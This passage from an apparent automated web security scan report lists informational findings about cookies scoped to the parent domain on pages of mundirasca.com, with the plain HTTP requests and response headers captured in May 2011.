Set-Cookie: BO=FM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:40 GMT; path=/
Set-Cookie: UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:40 GMT; path=/
Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:40 GMT; path=/
Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:40 GMT; path=/
Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 37105

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.137. http://www.mundirasca.com/AboutUs.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mundirasca.com
Path:	/AboutUs.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:41 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AboutUs.aspx HTTP/1.1
Host: www.mundirasca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSI_17=EncryptedUniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7&AffiliateID=17&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; LanguageCode=SPA; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=17; ASP.NET_SessionId=2d25pf55tujr15nis5ds4m55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:32:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:41 GMT; path=/
Set-Cookie: BO=FM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:41 GMT; path=/
Set-Cookie: UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:41 GMT; path=/
Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:41 GMT; path=/
Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:41 GMT; path=/
Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 37870

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.138. http://www.mundirasca.com/ContactUsChat.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mundirasca.com
Path:	/ContactUsChat.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:50 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ContactUsChat.aspx HTTP/1.1
Host: www.mundirasca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSI_17=EncryptedUniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7&AffiliateID=17&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; LanguageCode=SPA; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=17; ASP.NET_SessionId=2d25pf55tujr15nis5ds4m55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:32:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:50 GMT; path=/
Set-Cookie: BO=FM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:50 GMT; path=/
Set-Cookie: UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:50 GMT; path=/
Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:50 GMT; path=/
Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:50 GMT; path=/
Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 36409

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.139. http://www.mundirasca.com/ContactUsFax.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mundirasca.com
Path:	/ContactUsFax.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:51 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ContactUsFax.aspx HTTP/1.1
Host: www.mundirasca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSI_17=EncryptedUniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7&AffiliateID=17&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; LanguageCode=SPA; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=17; ASP.NET_SessionId=2d25pf55tujr15nis5ds4m55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:32:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:51 GMT; path=/
Set-Cookie: BO=FM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:51 GMT; path=/
Set-Cookie: UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:51 GMT; path=/
Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:51 GMT; path=/
Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:51 GMT; path=/
Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 36318

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.140. http://www.mundirasca.com/ContactUsMail.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mundirasca.com
Path:	/ContactUsMail.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:50 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ContactUsMail.aspx HTTP/1.1
Host: www.mundirasca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSI_17=EncryptedUniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7&AffiliateID=17&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; LanguageCode=SPA; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=17; ASP.NET_SessionId=2d25pf55tujr15nis5ds4m55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:32:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:50 GMT; path=/
Set-Cookie: BO=FM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:50 GMT; path=/
Set-Cookie: UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:50 GMT; path=/
Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:50 GMT; path=/
Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:50 GMT; path=/
Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44029

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.141. http://www.mundirasca.com/ContactUsTel.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mundirasca.com
Path:	/ContactUsTel.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:49 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ContactUsTel.aspx HTTP/1.1
Host: www.mundirasca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSI_17=EncryptedUniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7&AffiliateID=17&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; LanguageCode=SPA; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=17; ASP.NET_SessionId=2d25pf55tujr15nis5ds4m55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:32:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:49 GMT; path=/
Set-Cookie: BO=FM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:49 GMT; path=/
Set-Cookie: UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:49 GMT; path=/
Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:49 GMT; path=/
Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:49 GMT; path=/
Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 36099

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.142. http://www.mundirasca.com/FAQ.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mundirasca.com
Path:	/FAQ.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:53 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /FAQ.aspx HTTP/1.1
Host: www.mundirasca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSI_17=EncryptedUniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7&AffiliateID=17&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; LanguageCode=SPA; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=17; ASP.NET_SessionId=2d25pf55tujr15nis5ds4m55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:32:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:53 GMT; path=/
Set-Cookie: BO=FM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:53 GMT; path=/
Set-Cookie: UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:53 GMT; path=/
Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:53 GMT; path=/
Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:53 GMT; path=/
Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 86724

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.143. http://www.mundirasca.com/FairPlay.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mundirasca.com
Path:	/FairPlay.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:02 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /FairPlay.aspx HTTP/1.1
Host: www.mundirasca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSI_17=EncryptedUniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7&AffiliateID=17&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; LanguageCode=SPA; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=17; ASP.NET_SessionId=2d25pf55tujr15nis5ds4m55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:33:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:02 GMT; path=/
Set-Cookie: BO=FM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:02 GMT; path=/
Set-Cookie: UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:02 GMT; path=/
Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:02 GMT; path=/
Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:02 GMT; path=/
Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 38009

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.144. http://www.mundirasca.com/Help.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mundirasca.com
Path:	/Help.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:49 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Help.aspx HTTP/1.1
Host: www.mundirasca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSI_17=EncryptedUniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7&AffiliateID=17&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; LanguageCode=SPA; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=17; ASP.NET_SessionId=2d25pf55tujr15nis5ds4m55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:32:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:49 GMT; path=/
Set-Cookie: BO=FM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:49 GMT; path=/
Set-Cookie: UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:49 GMT; path=/
Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:49 GMT; path=/
Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:49 GMT; path=/
Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 36932

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.145. http://www.mundirasca.com/Home.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mundirasca.com
Path:	/Home.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

CSI_17=EncryptedUniqueVisitorID=65E5179F214E218C7690B36C8457FF60&AffiliateID=17&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=mundirasca.com; expires=Fri, 16-May-2031 11:41:38 GMT; path=/
UniqueVisitorID=65E5179F214E218C7690B36C8457FF60; domain=mundirasca.com; expires=Fri, 16-May-2014 11:41:38 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: www.mundirasca.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 16 May 2011 11:41:38 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=dvkvwu55wj1sbf3o2utk1m55; path=/; HttpOnly
Set-Cookie: CSI_17=EncryptedUniqueVisitorID=65E5179F214E218C7690B36C8457FF60&AffiliateID=17&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=mundirasca.com; expires=Fri, 16-May-2031 11:41:38 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=mundirasca.com; expires=Fri, 16-May-2014 11:41:38 GMT; path=/
Set-Cookie: BO=FM; domain=mundirasca.com; expires=Fri, 16-May-2014 11:41:38 GMT; path=/
Set-Cookie: UniqueVisitorID=65E5179F214E218C7690B36C8457FF60; domain=mundirasca.com; expires=Fri, 16-May-2014 11:41:38 GMT; path=/
Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 11:41:38 GMT; path=/
Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 11:41:38 GMT; path=/
Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/
Vary: Accept-Encoding
Content-Length: 37105

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.146. http://www.mundirasca.com/InviteFriend.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mundirasca.com
Path:	/InviteFriend.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:46 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /InviteFriend.aspx HTTP/1.1
Host: www.mundirasca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSI_17=EncryptedUniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7&AffiliateID=17&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; LanguageCode=SPA; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=17; ASP.NET_SessionId=2d25pf55tujr15nis5ds4m55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:32:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:46 GMT; path=/
Set-Cookie: BO=FM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:46 GMT; path=/
Set-Cookie: UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:46 GMT; path=/
Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:46 GMT; path=/
Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:46 GMT; path=/
Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 48682

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.147. http://www.mundirasca.com/PlayersClub.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mundirasca.com
Path:	/PlayersClub.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:48 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /PlayersClub.aspx HTTP/1.1
Host: www.mundirasca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSI_17=EncryptedUniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7&AffiliateID=17&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; LanguageCode=SPA; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=17; ASP.NET_SessionId=2d25pf55tujr15nis5ds4m55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:32:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:48 GMT; path=/
Set-Cookie: BO=FM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:48 GMT; path=/
Set-Cookie: UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:48 GMT; path=/
Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:48 GMT; path=/
Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:48 GMT; path=/
Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43378

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.148. http://www.mundirasca.com/Promotions.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mundirasca.com
Path:	/Promotions.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:46 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Promotions.aspx HTTP/1.1
Host: www.mundirasca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSI_17=EncryptedUniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7&AffiliateID=17&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; LanguageCode=SPA; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=17; ASP.NET_SessionId=2d25pf55tujr15nis5ds4m55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:32:47 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:46 GMT; path=/
Set-Cookie: BO=FM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:46 GMT; path=/
Set-Cookie: UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:46 GMT; path=/
Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:46 GMT; path=/
Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:46 GMT; path=/
Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39102

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

